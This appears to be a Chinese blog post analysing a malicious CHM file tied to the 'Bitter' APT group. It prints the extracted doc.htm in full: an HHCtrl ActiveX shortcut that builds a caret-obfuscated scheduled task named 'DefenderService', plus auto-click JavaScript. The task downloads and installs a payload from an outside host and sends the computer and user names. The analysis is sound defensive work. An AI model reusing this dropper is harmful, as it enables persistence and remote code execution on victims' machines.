下载链接

image.png

轻松反编译CHM格式的帮助文件或电子书
完美恢复CHM的.HHP工程文件
支持批量反编译CHM
支持从指定CHM文件里解压缩任意的文件
就像管理压缩文件那样简单

或者下载后将后缀“.doc”删除即可:
ChmDecompiler.exe.doc

提取文件

《安天CERT - “苦象”组织上半年针对我国的攻击活动分析》
会议纪要.chm - D91B888205AC1CA80C40426B9F5A6105
image.png

打开chm文件

image.png

解压文件

image.png

解压的文件

image.png

doc.htm

  1. <HTML>
  2. <TITLE></TITLE>
  3. <HEAD>
  4. </HEAD>
  5. <BODY>
  7. <OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
  8. <PARAM name="Command" value="ShortCut">
  9.  <PARAM name="Button" value="Bitmap::shortcut">
  10.  <PARAM name="Item1" value=",schtasks, /create /sc minute /mo 15 /tn DefenderService /tr &quot;%coMSPec% /c s^t^a^rt /^m^i^n m^s^i^e^xe^c ^/^i h^t^t^p^:/^/you^xiang^xiez^hu.co^m/you^xi^/cr^t.php?h=%computername%*%username% /^q^n ^/^norestart&quot; /f">
  11.  <PARAM name="Item2" value="273,1,1">
  12. </OBJECT>
  14. <SCRIPT>
  15. var _0x4f9b=['Click'];(function(_0xb5a54d,_0x9a7955){var _0x531e9d=function(_0x5c5a69){while(--_0x5c5a69){_0xb5a54d['push'](_0xb5a54d['shift']());}};_0x531e9d(++_0x9a7955);}(_0x4f9b,0xb3));var _0x3667=function(_0x3bd949,_0x29f930){_0x3bd949=_0x3bd949-0x0;var _0x9eeca2=_0x4f9b[_0x3bd949];return _0x9eeca2;};x[_0x3667('0x0')]();
  16. </SCRIPT>
  17. <img src="" />
  18. </BODY>
  19. </HTML>

CLDID

查询CLSID可知:“{ADB880A6-D8FF-11CF-9377-00AA003B7A11}”为对象“HHCtrl Object”:
CLSID

JavaScript

  1. <SCRIPT>
  2. var _0x4f9b=['Click'];
  3. function(_0xb5a54d,_0x9a7955)
  4. {
  5.     var _0x531e9d=function(_0x5c5a69)
  6.     {
  7.         while(--_0x5c5a69)
  8.         {
  9.             _0xb5a54d['push'](_0xb5a54d['shift']());
  10.         }
  11.     };
  12.     _0x531e9d(++_0x9a7955);
  13. }
  14. (_0x4f9b,0xb3);
  16. var _0x3667=function(_0x3bd949,_0x29f930)
  17. {
  18.     _0x3bd949=_0x3bd949-0x0;
  19.     var _0x9eeca2=_0x4f9b[_0x3bd949];
  20.     return _0x9eeca2;
  21. };
  22. x[_0x3667('0x0')]();
  24. </SCRIPT>